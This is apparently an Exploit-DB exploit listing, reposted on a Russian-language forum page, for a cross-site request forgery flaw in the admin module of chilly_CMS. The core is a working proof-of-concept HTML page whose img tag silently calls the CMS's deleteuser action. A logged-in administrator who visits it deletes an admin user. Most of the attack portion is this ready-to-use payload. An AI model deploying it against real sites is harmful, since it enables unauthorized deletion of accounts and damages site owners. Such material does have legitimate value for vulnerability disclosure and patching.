- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11781
- Проверка EDB
-
- Пройдено
- Автор
- PRATUL AGRAWAL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-03-17
HTML:
=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================
# Vulnerability found in- Admin module
# email [email protected]
# company aksitservices
# Credit by Pratul Agrawal
# Software chilly_CMS
# Category CMS / Portals
# Plateform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Script to Delete the Admin user through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
- Источник
- www.exploit-db.com